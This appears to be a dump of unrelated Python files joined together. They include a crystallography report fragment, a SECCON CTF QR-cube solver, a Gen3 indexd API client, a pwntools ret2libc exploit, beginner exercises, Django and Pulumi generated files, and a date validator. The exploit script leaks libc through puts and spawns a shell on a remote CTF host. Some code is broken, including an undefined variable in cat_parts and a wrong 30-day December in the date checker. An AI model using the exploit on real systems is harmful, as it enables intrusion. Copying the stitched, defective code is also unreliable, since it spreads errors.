for axis in ('h', 'k', 'l'):
styles['multiplicity_%s' %axis] = 'square-plot'
from jinja2 import Environment, ChoiceLoader, PackageLoader
loader = ChoiceLoader([PackageLoader('xia2', 'templates'),
PackageLoader('dials', 'templates')])
env = Environment(loader=loader)
if params.log_include:
log_text = open(params.log_include).read()
else:
log_text = ''
template = env.get_template('report.html')
html = template.render(page_title=params.title,
filename=os.path.abspath(unmerged_mtz),
space_group=report.intensities.space_group_info().symbol_and_number(),
unit_cell=str(report.intensities.unit_cell()),
mtz_history=[h.strip() for h in report.mtz_object.history()],
xtriage_success=xtriage_success,
xtriage_warnings=xtriage_warnings,
xtriage_danger=xtriage_danger,
overall_stats_table=overall_stats_table,
merging_stats_table=merging_stats_table,
cc_half_significance_level=params.cc_half_significance_level,
resolution_graphs=resolution_graphs,
batch_graphs=batch_graphs,
misc_graphs=misc_graphs,
styles=styles,
xia2_version=Version,
log_text=log_text,
)
with open('%s-report.json' % params.prefix, 'wb') as f:
json.dump(json_data, f)
with open('%s-report.html' % params.prefix, 'wb') as f:
f.write(html.encode('ascii', 'xmlcharrefreplace'))
if __name__ == '__main__':
import sys
run(sys.argv[1:])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import sys
import os
import numpy
import collections
import subprocess
from enum import IntEnum, auto
from pyzbar.pyzbar import decode
from PIL import Image
YELLOW = [ 0, 213, 255]
BLUE = [186, 81, 0]
GREEN = [ 96, 158, 0]
ORANGE = [ 0, 88, 255]
RED = [ 58, 30, 196]
WHITE = [255, 255, 255]
colors = [YELLOW, BLUE, GREEN, ORANGE, RED, WHITE]
def contains_color(img, bgr):
rows, cols, _ = img.shape
for i in range(rows):
for j in range(cols):
if (img[i, j] == bgr).all():
return True
return False
class Pos(IntEnum):
CENTER = 0
TOP = 1
RIGHT = 2
BTM = 3
LEFT = 4
TOP_LEFT = 5
TOP_RIGHT = 6
BTM_RIGHT = 7
BTM_LEFT = 8
def is_corner(self):
return self == Pos.TOP_LEFT or self == Pos.TOP_RIGHT or self == Pos.BTM_LEFT or self == Pos.BTM_RIGHT
def is_edge(self):
return self == Pos.TOP or self == Pos.BTM or self == Pos.LEFT or self == Pos.RIGHT
def get_top(img):
return img[0]
def get_bottom(img):
return img[-1]
def get_left(img):
return img[:, 1]
def get_right(img):
return img[:, -1]
class Matcher:
def __init__(self, bg_color):
self.bg_color = bg_color
def check_next(self, img1, img2):
pos1, pos2 = (self.get_pos(img1), self.get_pos(img2))
if (pos1.is_corner() and pos2.is_corner()) or (pos1.is_edge() and pos2.is_edge()):
return (None, None)
for pos in [Pos.TOP, Pos.BTM, Pos.LEFT, Pos.RIGHT]:
is_next, rotated = self.get_next_part(img1, img2, pos)
if is_next:
return (pos, rotated)
return (None, None)
def get_pos(self, img):
rows, cols, _ = img.shape
top = (get_top(img) == self.bg_color).all()
bottom = (get_bottom(img) == self.bg_color).all()
left = (get_left(img) == self.bg_color).all()
right = (get_right(img) == self.bg_color).all()
if top and left:
return Pos.TOP_LEFT
elif top and right:
return Pos.TOP_RIGHT
elif bottom and left:
return Pos.BTM_LEFT
elif bottom and right:
return Pos.BTM_RIGHT
elif top:
return Pos.TOP
elif bottom:
return Pos.BTM
elif left:
return Pos.LEFT
elif right:
return Pos.RIGHT
else:
return Pos.CENTER
def get_next_part(self, img1, img2, pos):
for r in range(4):
rotated = numpy.rot90(img2, k=r)
if pos == Pos.TOP and self.is_continuous(get_top(img1), get_bottom(rotated)):
return (True, rotated)
elif pos == Pos.BTM and self.is_continuous(get_bottom(img1), get_top(rotated)):
return (True, rotated)
elif pos == Pos.LEFT and self.is_continuous(get_left(img1), get_right(rotated)):
return (True, rotated)
elif pos == Pos.RIGHT and self.is_continuous(get_right(img1), get_left(rotated)):
return (True, rotated)
return (False, None)
# edge1: 1xn
# edge2: 1xn
def is_continuous(self, edge1, edge2):
return (not (edge1 == self.bg_color).all()) and (edge1 == edge2).all()
def cat_parts(img1, img2, pos):
if pos == Pos.TOP:
return cv2.vconcat([rotated, img1])
elif pos == Pos.BTM:
return cv2.vconcat([img1, rotated])
elif pos == Pos.LEFT:
return cv2.hconcat([rotated, img1])
elif pos == Pos.RIGHT:
return cv2.hconcat([img1, rotated])
def split_parts(png_files, color):
parts = []
for png in png_files:
img = cv2.imread(png, cv2.IMREAD_UNCHANGED)
print("splitting {0}".format(png))
for i in range(3):
for j in range(3):
splitted = img[(82*i):(82*(i+1)), (82*j):(82*(j+1))]
if contains_color(splitted, color):
# TODO: split png files just once and write them down
#cv2.imwrite("out-{0}x{1}-{2}".format(i, j, png), splitted)
parts.append(splitted)
return parts
def rotate_corner(matcher, corner, pos):
# clock-wise rotation: axes=(1, 0)
return numpy.rot90(corner, k=((pos - matcher.get_pos(corner))), axes=(1, 0))
def make_whole_image(qr_arr):
rows = []
for i in range(3):
rows.append(cv2.vconcat([qr_arr[i][0], qr_arr[i][1], qr_arr[i][2]]))
return cv2.hconcat([rows[0], rows[1], rows[2]])
def concat_parts(parts, color):
matcher = Matcher(color)
corner = None
for i in range(len(parts)):
if matcher.get_pos(parts[i]).is_corner():
corner = parts.pop(i)
break
qr_arr = [[None, None, None], [None, None, None], [None, None, None]]
qr_arr[0][0] = rotate_corner(matcher, corner, Pos.TOP_LEFT)
target = (0, 0)
while len(parts) > 1:
for n in range(len(parts)):
part = parts[n]
(i, j) = target
#print("n={0} len(parts)={1} target={2}".format(n, len(parts), target))
pos, rotated = matcher.check_next(qr_arr[i][j], part)
if pos == None:
continue
else:
if pos == Pos.TOP:
j -= 1
elif pos == Pos.BTM:
j += 1
elif pos == Pos.LEFT:
i -= 1
elif pos == Pos.RIGHT:
i += 1
if (1, 1) == (i, j):
continue
parts.pop(n)
qr_arr[i][j] = rotated
#print("found:", (i, j))
target = (i, j)
break
_, rotated = matcher.check_next(qr_arr[0][1], parts[0])
qr_arr[1][1] = rotated
return make_whole_image(qr_arr)
def create_qr_image(png_files, color):
parts = split_parts(png_files, color)
if len(parts) == 9:
print("[+] Done!")
else:
print("[-] Failed to split")
sys.exit(1)
return concat_parts(parts, color)
def get_qr_text(filename):
data = decode(Image.open(filename))
return data[0][0].decode('utf-8', 'ignore')
def qubic_rube(dir, code):
os.chdir(dir)
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_U.png"])
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_R.png"])
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_L.png"])
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_F.png"])
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_B.png"])
subprocess.call(["wget", "http://qubicrube.pwn.seccon.jp:33654/images/" + code + "_D.png"])
png_files = []
for path in os.listdir("."):
_, ext = os.path.splitext(path)
if ext == '.png':
png_files.append(path)
for i, color in enumerate(colors):
qr_img = create_qr_image(png_files, color)
qr_filename = "qr-{0}.png".format(i)
cv2.imwrite(qr_filename, qr_img)
qr_text = get_qr_text(qr_filename)
if qr_text.startswith("http://"):
os.chdir("..")
return qr_text.split("/")[-1]
if qr_text.startswith("SECCON{"):
print("Flag is: " + qr_text)
sys.exit(0)
if __name__ == '__main__':
next_code = "01000000000000000000" # 1
#next_code = "30468d9272ca9219655a" # 30
#next_code = "3142aec6cd75d8596295" # 31
for i in range(1, 51):
os.mkdir(str(i))
next_code = qubic_rube(str(i), next_code)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
|
import aiohttp
import backoff
import requests
import urllib.parse
from cdislogging import get_logger
import sys
import indexclient.client as client
from gen3.utils import DEFAULT_BACKOFF_SETTINGS, raise_for_status_and_print_error
from gen3.auth import Gen3Auth
logging = get_logger("__name__")
class Gen3Index:
"""
A class for interacting with the Gen3 Index services.
Args:
endpoint (str): public endpoint for reading/querying indexd - only necessary if auth_provider not provided
auth_provider (Gen3Auth): A Gen3Auth class instance or indexd basic creds tuple
Examples:
This generates the Gen3Index class pointed at the sandbox commons while
using the credentials.json downloaded from the commons profile page.
>>> auth = Gen3Auth(refresh_file="credentials.json")
... index = Gen3Index(auth)
"""
def __init__(self, endpoint=None, auth_provider=None, service_location="index"):
# legacy interface required endpoint as 1st arg
if endpoint and isinstance(endpoint, Gen3Auth):
auth_provider = endpoint
endpoint = None
if auth_provider and isinstance(auth_provider, Gen3Auth):
endpoint = auth_provider.endpoint
endpoint = endpoint.strip("/")
# if running locally, indexd is deployed by itself without a location relative
# to the commons
if "http://localhost" in endpoint:
service_location = ""
if not endpoint.endswith(service_location):
endpoint += "/" + service_location
self.client = client.IndexClient(endpoint, auth=auth_provider)
### Get Requests
def is_healthy(self):
"""
Return if indexd is healthy or not
"""
try:
response = self.client._get("_status")
response.raise_for_status()
except Exception:
return False
return response.text == "Healthy"
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_version(self):
"""
Return the version of indexd
"""
response = self.client._get("_version")
raise_for_status_and_print_error(response)
return response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_stats(self):
"""
Return basic info about the records in indexd
"""
response = self.client._get("_stats")
raise_for_status_and_print_error(response)
return response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_all_records(self, limit=None, paginate=False, start=None):
"""
Get a list of all records
"""
all_records = []
url = "index/"
if limit:
url += f"?limit={limit}"
response = self.client._get(url)
raise_for_status_and_print_error(response)
records = response.json().get("records")
all_records.extend(records)
if paginate and records:
previous_did = None
start_did = records[-1].get("did")
while start_did != previous_did:
previous_did = start_did
params = {"start": f"{start_did}"}
url_parts = list(urllib.parse.urlparse(url))
query = dict(urllib.parse.parse_qsl(url_parts[4]))
query.update(params)
url_parts[4] = urllib.parse.urlencode(query)
url = urllib.parse.urlunparse(url_parts)
response = self.client._get(url)
raise_for_status_and_print_error(response)
records = response.json().get("records")
all_records.extend(records)
if records:
start_did = response.json().get("records")[-1].get("did")
return all_records
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_records_on_page(self, limit=None, page=None):
"""
Get a list of all records given the page and page size limit
"""
params = {}
url = "index/"
if limit is not None:
params["limit"] = limit
if page is not None:
params["page"] = page
query = urllib.parse.urlencode(params)
response = self.client._get(url + "?" + query)
raise_for_status_and_print_error(response)
return response.json().get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_record(self, guid=None, _ssl=None):
"""
Asynchronous function to request a record from indexd.
Args:
guid (str): record guid
Returns:
dict: indexd record
"""
url = f"{self.client.url}/index/{guid}"
async with aiohttp.ClientSession() as session:
async with session.get(url, ssl=_ssl) as response:
raise_for_status_and_print_error(response)
response = await response.json()
return response
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_records_on_page(self, limit=None, page=None, _ssl=None):
"""
Asynchronous function to request a page from indexd.
Args:
page (int/str): indexd page to request
Returns:
List[dict]: List of indexd records from the page
"""
all_records = []
params = {}
if limit is not None:
params["limit"] = limit
if page is not None:
params["page"] = page
query = urllib.parse.urlencode(params)
url = f"{self.client.url}/index" + "?" + query
async with aiohttp.ClientSession() as session:
async with session.get(url, ssl=_ssl) as response:
response = await response.json()
return response.get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_records_from_checksum(
self, checksum, checksum_type="md5", _ssl=None
):
"""
Asynchronous function to request records from indexd matching checksum.
Args:
checksum (str): indexd checksum to request
checksum_type (str): type of checksum, defaults to md5
Returns:
List[dict]: List of indexd records
"""
all_records = []
params = {}
params["hash"] = f"{checksum_type}:{checksum}"
query = urllib.parse.urlencode(params)
url = f"{self.client.url}/index" + "?" + query
async with aiohttp.ClientSession() as session:
async with session.get(url, ssl=_ssl) as response:
response = await response.json()
return response.get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get(self, guid, dist_resolution=True):
"""
Get the metadata associated with the given id, alias, or
distributed identifier
Args:
guid: string
- record id
dist_resolution: boolean
- *optional* Specify if we want distributed dist_resolution or not
"""
rec = self.client.global_get(guid, dist_resolution)
if not rec:
return rec
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_urls(self, size=None, hashes=None, guids=None):
"""
Get a list of urls that match query params
Args:
size: integer
- object size
hashes: string
- hashes specified as algorithm:value
guids: list
- list of ids
"""
if guids:
guids = ",".join(guids)
p = {"size": size, "hash": hashes, "ids": guids}
urls = self.client._get("urls", params=p).json()
return [url for _, url in urls.items()]
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_record(self, guid):
"""
Get the metadata associated with a given id
"""
rec = self.client.get(guid)
if not rec:
return rec
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_record_doc(self, guid):
"""
Get the metadata associated with a given id
"""
return self.client.get(guid)
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_with_params(self, params=None):
"""
Return a document object corresponding to the supplied parameters, such
as ``{'hashes': {'md5': '...'}, 'size': '...', 'metadata': {'file_state': '...'}}``.
- need to include all the hashes in the request
- index client like signpost or indexd will need to handle the
query param `'hash': 'hash_type:hash'`
"""
rec = self.client.get_with_params(params)
if not rec:
return rec
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_with_params(self, params, _ssl=None):
"""
Return a document object corresponding to the supplied parameter
- need to include all the hashes in the request
- need to handle the query param `'hash': 'hash_type:hash'`
Args:
params (dict): params to search with
_ssl (None, optional): whether or not to use ssl
Returns:
Document: json representation of an entry in indexd
"""
query_params = urllib.parse.urlencode(params)
url = f"{self.client.url}/index/?{query_params}"
async with aiohttp.ClientSession() as session:
async with session.get(url, ssl=_ssl) as response:
await response.raise_for_status()
response = await response.json()
return response
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_latest_version(self, guid, has_version=False):
"""
Get the metadata of the latest index record version associated
with the given id
Args:
guid: string
- record id
has_version: boolean
- *optional* exclude entries without a version
"""
rec = self.client.get_latest_version(guid, has_version)
if not rec:
return rec
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_versions(self, guid):
"""
Get the metadata of index record version associated with the
given id
Args:
guid: string
- record id
"""
response = self.client._get(f"/index/{guid}/versions")
raise_for_status_and_print_error(response)
versions = response.json()
return [r for _, r in versions.items()]
### Post Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_record(
self,
hashes,
size,
did=None,
urls=None,
file_name=None,
metadata=None,
baseid=None,
acl=None,
urls_metadata=None,
version=None,
authz=None,
):
"""
Create a new record and add it to the index
Args:
hashes (dict): {hash type: hash value,}
eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
size (int): file size metadata associated with a given uuid
did (str): provide a UUID for the new indexd to be made
urls (list): list of URLs where you can download the UUID
acl (list): access control list
authz (str): RBAC string
file_name (str): name of the file associated with a given UUID
metadata (dict): additional key value metadata for this entry
urls_metadata (dict): metadata attached to each url
baseid (str): optional baseid to group with previous entries versions
version (str): entry version string
Returns:
Document: json representation of an entry in indexd
"""
rec = self.client.create(
hashes,
size,
did,
urls,
file_name,
metadata,
baseid,
acl,
urls_metadata,
version,
authz,
)
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_create_record(
self,
hashes,
size,
did=None,
urls=None,
file_name=None,
metadata=None,
baseid=None,
acl=None,
urls_metadata=None,
version=None,
authz=None,
_ssl=None,
):
"""
Asynchronous function to create a record in indexd.
Args:
hashes (dict): {hash type: hash value,}
eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
size (int): file size metadata associated with a given uuid
did (str): provide a UUID for the new indexd to be made
urls (list): list of URLs where you can download the UUID
acl (list): access control list
authz (str): RBAC string
file_name (str): name of the file associated with a given UUID
metadata (dict): additional key value metadata for this entry
urls_metadata (dict): metadata attached to each url
baseid (str): optional baseid to group with previous entries versions
version (str): entry version string
Returns:
Document: json representation of an entry in indexd
"""
async with aiohttp.ClientSession() as session:
if urls is None:
urls = []
json = {
"form": "object",
"hashes": hashes,
"size": size,
"urls": urls or [],
}
if did:
json["did"] = did
if file_name:
json["file_name"] = file_name
if metadata:
json["metadata"] = metadata
if baseid:
json["baseid"] = baseid
if acl:
json["acl"] = acl
if urls_metadata:
json["urls_metadata"] = urls_metadata
if version:
json["version"] = version
if authz:
json["authz"] = authz
# aiohttp only allows basic auth with their built in auth, so we
# need to manually add JWT auth header
headers = {"Authorization": self.client.auth._get_auth_value()}
async with session.post(
f"{self.client.url}/index/",
json=json,
headers=headers,
ssl=_ssl,
) as response:
assert response.status == 200, await response.json()
response = await response.json()
return response
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_blank(self, uploader, file_name=None):
"""
Create a blank record
Args:
json - json in the format:
{
'uploader': type(string)
'file_name': type(string) (optional*)
}
"""
json = {"uploader": uploader, "file_name": file_name}
response = self.client._post(
"index/blank",
headers={"content-type": "application/json"},
auth=self.client.auth,
data=client.json_dumps(json),
)
raise_for_status_and_print_error(response)
rec = response.json()
return self.get_record(rec["did"])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_new_version(
self,
guid,
hashes,
size,
did=None,
urls=None,
file_name=None,
metadata=None,
acl=None,
urls_metadata=None,
version=None,
authz=None,
):
"""
Add new version for the document associated to the provided uuid
Since data content is immutable, when you want to change the
size or hash, a new index document with a new uuid needs to be
created as its new version. That uuid is returned in the did
field of the response. The old index document is not deleted.
Args:
guid: (string): record id
hashes (dict): {hash type: hash value,}
eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
size (int): file size metadata associated with a given uuid
did (str): provide a UUID for the new indexd to be made
urls (list): list of URLs where you can download the UUID
file_name (str): name of the file associated with a given UUID
metadata (dict): additional key value metadata for this entry
acl (list): access control list
urls_metadata (dict): metadata attached to each url
version (str): entry version string
authz (str): RBAC string
body: json/dictionary format
- Metadata object that needs to be added to the store.
Providing size and at least one hash is necessary and
sufficient. Note: it is a good idea to add a version
number
"""
if urls is None:
urls = []
json = {
"urls": urls,
"form": "object",
"hashes": hashes,
"size": size,
"file_name": file_name,
"metadata": metadata,
"urls_metadata": urls_metadata,
"acl": acl,
"authz": authz,
"version": version,
}
if did:
json["did"] = did
response = self.client._post(
"index",
guid,
headers={"content-type": "application/json"},
data=client.json_dumps(json),
auth=self.client.auth,
)
raise_for_status_and_print_error(response)
rec = response.json()
if rec and "did" in rec:
return self.get_record(rec["did"])
return None
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_records(self, dids):
"""
Get a list of documents given a list of dids
Args:
dids: list
- a list of record ids
Returns:
list: json representing index records
"""
try:
response = self.client._post(
"bulk/documents", json=dids, auth=self.client.auth
)
except requests.HTTPError as exception:
if exception.response.status_code == 404:
return None
else:
raise exception
return response.json()
### Put Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def update_blank(self, guid, rev, hashes, size, urls=None, authz=None):
"""
Update only hashes and size for a blank index
Args:
guid (string): record id
rev (string): data revision - simple consistency mechanism
hashes (dict): {hash type: hash value,}
eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
size (int): file size metadata associated with a given uuid
"""
params = {"rev": rev}
json = {"hashes": hashes, "size": size}
if urls:
json["urls"] = urls
if authz:
json["authz"] = authz
response = self.client._put(
"index/blank",
guid,
headers={"content-type": "application/json"},
params=params,
auth=self.client.auth,
data=client.json_dumps(json),
)
raise_for_status_and_print_error(response)
rec = response.json()
return self.get_record(rec["did"])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def update_record(
self,
guid,
file_name=None,
urls=None,
version=None,
metadata=None,
acl=None,
authz=None,
urls_metadata=None,
):
"""
Update an existing entry in the index
Args:
guid: string
- record id
body: json/dictionary format
- index record information that needs to be updated.
- can not update size or hash, use new version for that
"""
updatable_attrs = {
"file_name": file_name,
"urls": urls,
"version": version,
"metadata": metadata,
"acl": acl,
"authz": authz,
"urls_metadata": urls_metadata,
}
rec = self.client.get(guid)
for k, v in updatable_attrs.items():
if v is not None:
exec(f"rec.{k} = v")
rec.patch()
return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_update_record(
self,
guid,
file_name=None,
urls=None,
version=None,
metadata=None,
acl=None,
authz=None,
urls_metadata=None,
_ssl=None,
**kwargs,
):
"""
Asynchronous function to update a record in indexd.
Args:
guid: string
- record id
body: json/dictionary format
- index record information that needs to be updated.
- can not update size or hash, use new version for that
"""
async with aiohttp.ClientSession() as session:
updatable_attrs = {
"file_name": file_name,
"urls": urls,
"version": version,
"metadata": metadata,
"acl": acl,
"authz": authz,
"urls_metadata": urls_metadata,
}
record = await self.async_get_record(guid)
revision = record.get("rev")
for key, value in updatable_attrs.items():
if value is not None:
record[key] = value
del record["created_date"]
del record["rev"]
del record["updated_date"]
del record["version"]
del record["uploader"]
del record["form"]
del record["urls_metadata"]
del record["baseid"]
del record["size"]
del record["hashes"]
del record["did"]
logging.info(f"PUT-ing record: {record}")
# aiohttp only allows basic auth with their built in auth, so we
# need to manually add JWT auth header
headers = {"Authorization": self.client.auth._get_auth_value()}
async with session.put(
f"{self.client.url}/index/{guid}?rev={revision}",
json=record,
headers=headers,
ssl=_ssl,
) as response:
assert response.status == 200, await response.json()
response = await response.json()
return response
### Delete Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def delete_record(self, guid):
"""
Delete an entry from the index
Args:
guid: string
- record id
Returns: Nothing
"""
rec = self.client.get(guid)
if rec:
rec.delete()
return rec
### Query Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def query_urls(self, pattern):
"""
Query all record URLs for given pattern
Args:
pattern (str): pattern to match against indexd urls
Returns:
List[records]: indexd records with urls matching pattern
"""
response = self.client._get(f"/_query/urls/q?include={pattern}")
raise_for_status_and_print_error(response)
return response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_query_urls(self, pattern, _ssl=None):
"""
Asynchronous function to query urls from indexd.
Args:
pattern (str): pattern to match against indexd urls
Returns:
List[records]: indexd records with urls matching pattern
"""
url = f"{self.client.url}/_query/urls/q?include={pattern}"
async with aiohttp.ClientSession() as session:
logging.debug(f"request: {url}")
async with session.get(url, ssl=_ssl) as response:
raise_for_status_and_print_error(response)
response = await response.json()
return response
## Mint GUID Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_valid_guids(self, count=None):
"""
Get a list of valid GUIDs without indexing
Args:
count (int): number of GUIDs to request
Returns:
List[str]: list of valid indexd GUIDs
"""
url = "/guid/mint"
if count:
url += f"?count={count}"
response = self.client._get(url)
response.raise_for_status()
return response.json().get("guids", [])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_guids_prefix(self):
"""
Get the prefix for GUIDs if there is one
Returns:
str: prefix for this instance
"""
response = self.client._get("/guid/prefix")
response.raise_for_status()
return response.json().get("prefix")
def _print_func_name(function):
return "{}.{}".format(function.__module__, function.__name__)
def _print_kwargs(kwargs):
return ", ".join("{}={}".format(k, repr(v)) for k, v in list(kwargs.items()))
|
from pwn import *
puts_plt = 0x080483b0
puts_got = 0x0804a014
vuln = 0x0804850a
# p = process('./ropme')
p = remote("plzpwn.me",6003);
# gdb.attach(p, gdbscript = 'b *vuln+1')
print p.recv()
p.sendline(
'A'*12 +
p32(puts_plt) +
p32(vuln+1) +
p32(puts_got)
)
leak = u32(p.recv(4))
print hex(leak)
# p.interactive()
p.recv()
# libc = ELF('./libc-2.27.so')
libc = ELF('./libc-2.23.so')
libc.address = leak - libc.symbols['_IO_puts']
system = libc.symbols['system']
binsh = libc.search("/bin/sh").next()
print "system() = " + hex(system)
print "binsh() = " + hex(binsh)
p.sendline(
'A'*12+
p32(system)+
p32(0)+
p32(binsh)
)
p.interactive()
|
from multiprocessing import Process
import time,threading
import os
def tt():
print(threading.get_ident()) #获取线程的id
pass
def run(name):
time.sleep(2)
print('hello %s'%name)
t = threading.Thread(target=tt,)
t.start()
if __name__ == '__main__':
for i in range(20):
p = Process(target=run, args = ("bling %s"%i,))
p.start()
# p.join() |
'''
Напишите программу, которая считывает длины двух катетов в прямоугольном треугольнике и выводит его площадь.
Каждое число записано в отдельной строке.
'''
b = int(input())
h = int(input())
s = (b * h) / 2
print(s) |
# Generated by Django 2.2.1 on 2019-06-04 13:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0010_recomsim'),
]
operations = [
migrations.AlterModelOptions(
name='recomsim',
options={'managed': False},
),
]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
from .. import utilities
class Certificate(pulumi.CustomResource):
"""
Provides a DigitalOcean Certificate resource that allows you to manage
certificates for configuring TLS termination in Load Balancers.
Certificates created with this resource can be referenced in your
Load Balancer configuration via their ID.
"""
def __init__(__self__, __name__, __opts__=None, certificate_chain=None, domains=None, leaf_certificate=None, name=None, private_key=None, type=None):
"""Create a Certificate resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if certificate_chain and not isinstance(certificate_chain, basestring):
raise TypeError('Expected property certificate_chain to be a basestring')
__self__.certificate_chain = certificate_chain
"""
The full PEM-formatted trust chain
between the certificate authority's certificate and your domain's TLS
certificate.
"""
__props__['certificateChain'] = certificate_chain
if domains and not isinstance(domains, list):
raise TypeError('Expected property domains to be a list')
__self__.domains = domains
__props__['domains'] = domains
if leaf_certificate and not isinstance(leaf_certificate, basestring):
raise TypeError('Expected property leaf_certificate to be a basestring')
__self__.leaf_certificate = leaf_certificate
"""
The contents of a PEM-formatted public
TLS certificate.
"""
__props__['leafCertificate'] = leaf_certificate
if name and not isinstance(name, basestring):
raise TypeError('Expected property name to be a basestring')
__self__.name = name
"""
The name of the certificate for identification.
"""
__props__['name'] = name
if private_key and not isinstance(private_key, basestring):
raise TypeError('Expected property private_key to be a basestring')
__self__.private_key = private_key
"""
The contents of a PEM-formatted private-key
corresponding to the SSL certificate.
"""
__props__['privateKey'] = private_key
if type and not isinstance(type, basestring):
raise TypeError('Expected property type to be a basestring')
__self__.type = type
__props__['type'] = type
__self__.not_after = pulumi.runtime.UNKNOWN
"""
The expiration date of the certificate
"""
__self__.sha1_fingerprint = pulumi.runtime.UNKNOWN
"""
The SHA-1 fingerprint of the certificate
"""
__self__.state = pulumi.runtime.UNKNOWN
super(Certificate, __self__).__init__(
'do:core/certificate:Certificate',
__name__,
__props__,
__opts__)
def set_outputs(self, outs):
if 'certificateChain' in outs:
self.certificate_chain = outs['certificateChain']
if 'domains' in outs:
self.domains = outs['domains']
if 'leafCertificate' in outs:
self.leaf_certificate = outs['leafCertificate']
if 'name' in outs:
self.name = outs['name']
if 'notAfter' in outs:
self.not_after = outs['notAfter']
if 'privateKey' in outs:
self.private_key = outs['privateKey']
if 'sha1Fingerprint' in outs:
self.sha1_fingerprint = outs['sha1Fingerprint']
if 'state' in outs:
self.state = outs['state']
if 'type' in outs:
self.type = outs['type']
|
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager
from shortuuidfield import ShortUUIDField
from django.db import models
class User(AbstractBaseUser, PermissionsMixin):
uid = ShortUUIDField(primary_key=True)
name = models.CharField(max_length=20, blank=True, null=True)
password = models.CharField(max_length=20, blank=True, null=True)
age = models.IntegerField(blank=True, null=True)
gender = models.CharField(max_length=2, blank=True, null=True)
profile = models.CharField(max_length=255, blank=True, null=True)
class Meta:
managed = False
db_table = 'User'
|
# Problem[2056] : 연월일 순으로 구성된 8자리의 날짜가 입력으로 주어진다. 해당 날짜의 유효성을 판단한 후, 날짜가 유효하다면 ”YYYY/MM/DD”형식으로 출력
# 단, 날짜가 유효하지 않다면 -1을 출력
def isDate(a, b) :
if (int(a) not in range(1,13)) :
return False
elif (int(a) == 2) :
if(int(b) not in range (1,29)) :
return False
else :
return True
elif (int(a) == 1 or int(a) == 3 or int(a) == 5 or int(a) == 7 or int(a) ==8 or int(a) ==10 or int(a) == 11) :
if(int(b) not in range(1,32)) :
return False
else :
return True
elif (int(a) == 4 or int(a) == 6 or int(a) == 9 or int(a) == 12) :
if(int(b) not in range(1,31)) :
return False
else :
return True
test_cnt = int(input())
result_list = list()
result_list = [0]*test_cnt
for index in range(test_cnt):
date_input = input()
year = date_input[0:4]
month = date_input[4:6]
date = date_input[6:8]
result = isDate(month,date)
if result == True:
string = year + '/' + month + '/' + date
result_list[index] = string
elif result == False :
string = '-1'
result_list[index] = string
for idx,result in enumerate(result_list):
print("#{} {}".format(idx+1,result))
|
import itertools
import logging
import random
import numpy as np
import torch
from cvxopt import matrix, solvers, spmatrix
from ortools.graph import pywrapgraph
